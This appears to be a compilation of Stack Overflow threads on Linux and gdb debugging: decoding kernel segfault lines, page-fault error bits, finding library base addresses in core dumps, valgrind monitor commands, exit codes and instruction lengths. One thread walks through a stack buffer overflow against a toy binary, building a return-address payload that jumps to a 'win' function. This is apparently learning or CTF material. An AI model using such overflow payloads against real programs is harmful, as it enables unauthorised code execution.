This can be a very simple question, I'm am attempting to debug an application which generates the following segfault error in the kern.log
kernel: myapp[15514]: segfault at 794ef0 ip 080513b sp 794ef0 error 6 in myapp[8048000+24000]
Here are my questions:
Is there any documentation as to what are the diff error numbers on segfault, in this instance it is error 6, but i've seen error 4, 5
What is the meaning of the information at bf794ef0 ip 0805130b sp bf794ef0 and myapp[8048000+24000]?
So far i was able to compile with symbols, and when i do a x 0x8048000+24000 it returns a symbol, is that the correct way of doing it? My assumptions thus far are the following:
sp = stack pointer?
ip = instruction pointer
at = ????
myapp[8048000+24000] = address of symbol?
When the report points to a program, not a shared library
Run addr2line -e myapp 080513b (and repeat for the other instruction pointer values given) to see where the error is happening. Better, get a debug-instrumented build, and reproduce the problem under a debugger such as gdb.
If it's a shared library
In the libfoo.so[NNNNNN+YYYY] part, the NNNNNN is where the library was loaded. Subtract this from the instruction pointer (ip) and you'll get the offset into the .so of the offending instruction. Then you can use objdump -DCgl libfoo.so and search for the instruction at that offset. You should easily be able to figure out which function it is from the asm labels. If the .so doesn't have optimizations you can also try using addr2line -e libfoo.so <offset>.
What the error means
Here's the breakdown of the fields:
address - the location in memory the code is trying to access (it's likely that 10 and 11 are offsets from a pointer we expect to be set to a valid value but which is instead pointing to 0)
ip - instruction pointer, ie. where the code which is trying to do this lives
sp - stack pointer
error - Architecture-specific flags; see arch/*/mm/fault.c for your platform.
Based on my limited knowledge, your assumptions are correct.
sp = stack pointer
ip = instruction pointer
myapp[8048000+24000] = address
If I were debugging the problem I would modify the code to produce a core dump or log a stack backtrace on the crash. You might also run the program under (or attach) GDB.
The error code is just the architectural error code for page faults and seems to be architecture specific. They are often documented in arch/*/mm/fault.c in the kernel source. My copy of Linux/arch/i386/mm/fault.c has the following definition for error_code:
bit 0 == 0 means no page found, 1 means protection fault
bit 1 == 0 means read, 1 means write
bit 2 == 0 means kernel, 1 means user-mode
My copy of Linux/arch/x86_64/mm/fault.c adds the following:
bit 3 == 1 means fault was an instruction fetch
If it's a shared library
You're hosed, unfortunately; it's not possible to know where the
libraries were placed in memory by the dynamic linker after-the-fact.
Well, there is still a possibility to retrieve the information, not from the binary, but from the object. But you need the base address of the object. And this information still is within the coredump, in the link_map structure.
So first you want to import the struct link_map into GDB. So lets compile a program with it with debug symbol and add it to the GDB.
link.c
#include <link.h>
toto(){struct link_map * s = 0x400;}
get_baseaddr_from_coredump.sh
#!/bin/bash
BINARY=$(which myapplication)
IsBinPIE ()
{
readelf -h $1|grep 'Type' |grep "EXEC">/dev/null || return 0
return 1
}
Hex2Decimal ()
{
export number="`echo "$1" | sed -e 's:^0[xX]::' | tr '[a-f]' '[A-F]'`"
export number=`echo "ibase=16; $number" | bc`
}
GetBinaryLength ()
{
if [ $# != 1 ]; then
echo "Error, no argument provided"
fi
IsBinPIE $1 || (echo "ET_EXEC file, need a base_address"; exit 0)
export totalsize=0
# Get PT_LOAD's size segment out of Program Header Table (ELF format)
export sizes="$(readelf -l $1 |grep LOAD |awk '{print $6}'|tr '\n' ' ')"
for size in $sizes
do Hex2Decimal "$size"; export totalsize=$(expr $number + $totalsize); export totalsize=$(expr $number + $totalsize)
done
return $totalsize
}
if [ $# = 1 ]; then
echo "Using binary $1"
IsBinPIE $1 && (echo "NOT ET_EXEC, need a base_address..."; exit 0)
BINARY=$1
fi
gcc -g3 -fPIC -shared link.c -o link.so
GOTADDR=$(readelf -S $BINARY|grep -E '\.got.plt[ \t]'|awk '{print $4}')
echo "First do the following command :"
echo file $BINARY
echo add-symbol-file ./link.so 0x0
read
echo "Now copy/paste the following into your gdb session with attached coredump"
cat <<EOF
set \$linkmapaddr = *(0x$GOTADDR + 4)
set \$mylinkmap = (struct link_map *) \$linkmapaddr
while (\$mylinkmap != 0)
if (\$mylinkmap->l_addr)
printf "add-symbol-file .%s %#.08x\n", \$mylinkmap->l_name, \$mylinkmap->l_addr
end
set \$mylinkmap = \$mylinkmap->l_next
end
it will print you the whole link_map content, within a set of GDB command.
It itself it might seems unnesseray but with the base_addr of the shared object we are about, you might get some more information out of an address by debuging directly the involved shared object in another GDB instance.
Keep the first gdb to have an idee of the symbol.
NOTE : the script is rather incomplete i suspect you may add to the second parameter of add-symbol-file printed the sum with this value :
readelf -S $SO_PATH|grep -E '\.text[ \t]'|awk '{print $5}'
where $SO_PATH is the first argument of the add-symbol-file
Hope it helps
Related
I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
This is what I get
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
Notice those last characters! I know that it's not what I was suppose to get. The address I wish to run on EIP register is 0804863b. I had to put this on little endian for the exploit to run properly. Any comments on this?
If you run this payload:
python -c 'print "A"*112 + "B"*4' > attack_payload
And then if you have the control of the PC (EIP=42424242)
(gdb) r < attack_payload
You can replace the "BBBB" with your address 0804863b
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
It is all, you should verify before if you have the EIP control.
More info (I see the source code), in a simple way (for a better explanation) try to compile with the following command
gcc -o main main.c -fno-stack-protector -g -m32
Run it with the debugger (gdb ./main) and set the following breakpoint
gef➤ b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
Continue and insert the following payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Go on at the instruction
→ 0x804862d <stringLength+60> ret
And you can see that now you have the control of the ret value
gef➤ bt
#0 0x0804862d in stringLength () at main.c:14
#1 0x43434343 in ?? ()
#2 0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤ x/x $sp
0xffffd5ec: 0x43434343
Now you can replace "CCCC" with the address of the win function
gef➤ p win
$1 = {void ()} 0x80485dd <win>
You can automatize all with a simple python script (try to see this library pwntools), you payload will be:
payload = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
payload += "\xdd\x85\x04\x08"
Or also you can run
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main
Let's say I'm debugging with valgrind and gdb by doing:
$ valgrind --vgdb-error=0 ./magic
...and then in a second terminal:
$ gdb ./magic
...
(gdb) target remote | /usr/lib/valgrind/../../bin/vgdb
If I want to examine the defined-ness of some memory, I can use:
(gdb) p &batman
$1 = (float *) 0xffeffe20c
(gdb) p sizeof(batman)
$2 = 4
(gdb) monitor get_vbits 0xffeffe20c 4
ffffffff
Using three commands to do one thing is kind of annoying, especially since I usually want to do this a few times for many different variables in the same stack frame. But if I try the obvious thing, I get:
(gdb) monitor get_vbits &batman sizeof(batman)
missing or malformed address
Is it possible to get gdb to evaluate &batman and sizeof(batman) on the same line as my monitor command?
But if I try the obvious thing, I get: missing or malformed address
This is from GDB doc (http://sourceware.org/gdb/onlinedocs/gdb/Connecting.html#index-monitor-1210) for the monitor cmd:
monitor cmd
This command allows you to send arbitrary commands
directly to the remote monitor. Since gdb doesn't care about the
commands it sends like this, this command is the way to extend gdb—you
can add new commands that only the external monitor will understand
and implement.
As you can see "gdb doesn't care about the commands it sends like this". It probably means that the command after monitor is not processed in any way and sent AS IS.
What you can do to evaluate your variable on the same line is to use user defined commands in gdb (http://sourceware.org/gdb/onlinedocs/gdb/Define.html). Define your own comand and use the eval gdb command to prepare your command with necessary values (http://sourceware.org/gdb/current/onlinedocs/gdb/Output.html#index-eval-1744):
define monitor_var
eval "monitor get_vbits %p %d", &$arg0, sizeof($arg0)
end
And then use it like this:
(gdb) monitor_var batman
I write a simple case to see how my system treats a failure indicator from main.
But nothing happened. I really want to know what's the difference between return 0 and return -1.
int main()
{
return -1;
}
That depends on what your "system" is. If you just run a program then this value is ignored.
The only time this is used is if your program is part of a larger workflow where your program's failure matters. For example, a makefile (or a C++ IDE) will stop building the program if there's a failure in one of the steps. This failure is signaled by an error code from main().
most of the times, the return value in main has no use, traditionally, we return 0 to indicate the program is success, especially in Windows. But in Linux, we often have a chain of programs, which means the second program's state depends on the first one's result. At that time, the return value has its position.
So, no matter what the return value is, most of the times its depends on your design, and it means nothing to system.
Hope that can help you.
Assuming you have compiled an executable named a.out, consider:
$ ./a.out # ignore the value returned from main
$ ./a.out && echo success # check the value returned from main
$ ./a.out || echo failure
In the second and third case, the echo will only occur if a.out is successful or not, respectively, where success is defined as returning zero from main. This is a convention that may be more clear with the following syntax:
if ./a.out; then
echo a.out returned zero from main
else
echo a.out returned non-zero from main
fi
The return value of main() is available:
To the shell, if the shell started it, as $status etc, depending on which shell you're using.
To the program that started it, via the status variable pointed to by the argument to wait(). See man 2 wait().
GNU has precisely nothing do to with it.
If using the bash shell (or similar), you can show the return value of the last command executed with echo $?. Sample bash terminal session:
$false
$echo $?
1
$true
$echo $?
0
$
On other systems the return value will be accessed differently. On DOS or Windows the return value can be checked with the ERRORLEVEL command or %ERRORLEVEL% variable.
The problem I am trying to solve is that I want to dynamically compute the length of an instruction given its address (from within GDB) and set that length as the value of a variable. The challenge is that I don't want any extraneous output printed to the console (e.g. disassembled instructions, etc.).
My normal approach to this is to do x/2i ADDR, then subtract the two addresses. I would like to achieve the same thing automatically; however, I don't want anything printed to the console. If I could disable console output then I would be able to do this by doing x/2i ADDR, followed by $_ - ADDR.
I have not found a way to disable the output of a command in GDB. If you know such a way then please tell me! However, I have discovered interpreter-exec and GDB/MI. A quick test shows that doing x/2i works on GDB/MI, and the value of $_ computed by the MI interpreter is shared with the console interpreter. Unfortunately, this approach also spits out a lot of output.
Does anyone know a way to either calculate the length of an instruction without displaying anything, or how to disable the output of interpreter-exec, thus allowing me to achieve my goal? Thank you.
I'll give an arguably cleaner and more extensible solution that's not really shorter. It implements $instn_length() as a new GDB convenience function.
Save this to instn-length.py
import gdb
def instn_length(addr_expr):
t = gdb.execute('x/2i ' + addr_expr, to_string=True)
return long(gdb.parse_and_eval('$_')) - long(gdb.parse_and_eval(addr_expr))
class InstnLength(gdb.Function):
def __init__(self):
super(InstnLength, self).__init__('instn_length')
def invoke(self, addr):
return instn_length(str(long(addr)))
InstnLength()
Then run
$ gdb -q -x instn-length.py /bin/true
Reading symbols from /usr/bin/true...Reading symbols from /usr/lib/debug/usr/bin/true.debug...done.
done.
(gdb) start
Temporary breakpoint 1 at 0x4014c0: file true.c, line 59.
Starting program: /usr/bin/true
Temporary breakpoint 1, main (argc=1, argv=0x7fffffffde28) at true.c:59
59 if (argc == 2)
(gdb) p $instn_length($pc)
$1 = 3
(gdb) disassemble /r $pc, $pc + 4
Dump of assembler code from 0x4014c0 to 0x4014c4:
An alternative implementation of instn_length() is to use the gdb.Architecture.disassemble() method in GDB 7.6+:
def instn_length(addr_expr):
addr = long(gdb.parse_and_eval(addr_expr))
arch = gdb.selected_frame().architecture()
return arch.disassemble(addr)[0]['length']
I have found a suitable solution; however, shorter solutions would be preferred. This solution sets a logging file to /dev/null, sets to to be overridden if it exists, and then redirects the console output to the log file temporarily.
define get-in-length
set logging file /dev/null
set logging overwrite on
set logging redirect on
set logging on
x/2i $arg0
set logging off
set logging redirect off
set logging overwrite off
set $_in_length = ((unsigned long) $_) - ((unsigned long) $arg0)
end
This solution was heavily inspired by another question's answer: How to get my program name in GDB when writting a "define" script?.
I executed following commands in gdb and console output is as follows:
Rohan_gdb$ set $var = 15
Rohan_gdb$ p $var
$5 = 0xf
Rohan_gdb$ set $var = (int *)10
Rohan_gdb$ p $var
$6 = (int *) 0xa
Rohan_gdb$ set $char = "abc"
Rohan_gdb$ p $char
$7 = "abc"
Rohan_gdb$ set $char = (char *)"xyz"
evaluation of this expression requires the program to have a function "malloc".
(here I got error)
Rohan_gdb$ p $char
$8 = "abc"
Rohan_gdb$
Here I am debugging with target and not native debugging. I am using GNU gdb (GDB) 7.2 version. Is it possible to solve using scripts.
I don't know how to solve your specific problem, but I ran across something similar. Given the age of the question, maybe this'll provide a clue.
The problem is that your script is trying to store away a value in a buffer and it must allocated a new buffer for that storage. The storage requirement is likely the result of the cast or because that second string is not in the constant strings within your binary.
To fix, either change your code to not require a malloc (which is a bit of hit or miss, as far as I can tell). Or make the malloc symbol available; load a symbol table that allows gdb to resolve the "_malloc" symbol.
All values are interpreted in the current language. This means, for example, that if the current source language is C/C++ then searching for the string “hello” includes the trailing \0. The null terminator can be removed from searching by using casts, e.g.: {char[5]}"hello".
https://sourceware.org/gdb/onlinedocs/gdb/Searching-Memory.html
Example:
https://github.com/PhoenixInteractiveNL/emuDownloadCenter/wiki/Emulator-wincpc <-> WinCPC is the Borland Delphi port of an Amstrad CPC emulator called vbCPC.
F:\flynns_WinCPC>gdb wincpc.exe<br>
GNU gdb (GDB) 7.6<br>
...<br>
This GDB was configured as "i686-pc-mingw32".<br>
...<br>
Reading symbols from F:\flynns_WinCPC\wincpc.exe...(no debugging symbols found)...done.<br>
(gdb) info files<br>
Symbols from "F:\flynns_WinCPC\wincpc.exe".<br>
Local exec file:<br>
`F:\flynns_WinCPC\wincpc.exe', file type pei-i386.<br>
Entry point: 0x558448<br>
0x00401000 - 0x005587ec is CODE<br>
0x00559000 - 0x0055f7f8 is DATA<br>
0x007bf000 - 0x007c1b88 is .idata<br>
0x007c3000 - 0x007c301f is .rdata<br>
0x007c4000 - 0x007db530 is .reloc<br>
0x007dc000 - 0x00861c00 is .rsrc<br>
(gdb) find 0x00401000,0x00861c00,'m','e','m','o','r','y'<br>
0x48b224<br>
0x48b2e8<br>
0x48b312<br>
0x48b33a<br>
0x48b354<br>
0x48c2cc<br>
0x48cfcb<br>
0x82d910<br>
0x841484<br>
0x8456f9<br>
10 patterns found.<br>
(gdb) find 0x00401000,0x00861c00, <strong>{char[6]}</strong> "memory"<br>
evaluation of this expression requires the program to have a function "malloc".<br>